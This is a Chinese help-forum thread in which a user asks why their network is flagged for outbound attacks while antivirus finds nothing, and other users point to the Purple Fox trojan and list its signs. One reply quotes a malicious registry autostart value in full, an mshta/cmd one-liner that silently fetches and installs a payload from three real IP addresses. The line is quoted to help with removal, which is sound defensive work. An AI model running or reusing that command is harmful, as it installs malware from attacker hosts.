大暖男_279 发表于 2024-9-6 15:39

对外网络攻击,监测到,杀了却没毒 ,怎么搞

大暖男_279 发表于 2024-9-6 15:43

来个大佬指导一下吧,我太难啦

leo0205 发表于 2024-9-6 17:30

您好,您用系统急救箱强力模式扫描修复试试看

沧桑浪子 发表于 2024-9-7 09:40

本帖最后由 沧桑浪子 于 2024-9-7 09:42 编辑

有紫狐木马那味,一般svchost.exe占用也很大!
局域网有多少电脑?
都查下看看

而且会查到类似 MsXXXXXXXXapp.DLL 的文件名
还有什么.log,jpg文件


沧桑浪子 发表于 2024-9-7 09:50

本帖最后由 沧桑浪子 于 2024-9-7 09:53 编辑


看看有没有类似

注册表值:mshta.exe vb:createobject(w.shell).run(Cmd /c for /d %i in (61.174.50.5:13321 177.137.96.14:12264 78.141.219.184:17508 ) do Msiexec /i http://%i/F12E5CE5.Png /Q,0)(window.close)
处理建议:禁止自启动

这种扫描结果。

【已解决】这是什么病毒?是紫狐吗?_360社区https://bbs.360.cn/thread-15981683-1-1.html

沧桑浪子 发表于 2024-9-7 09:55

360账号ip河南?

360提示mahta恶意命令执行攻击_360社区https://bbs.360.cn/thread-16096168-1-1.html

这个也是河南。。。
你那是什么公司

沧桑浪子 发表于 2024-9-7 10:02

把这两个ip的电脑的高危漏洞都打下
页: [1]
查看完整版本: 对外网络攻击,监测到,杀了却没毒 ,怎么搞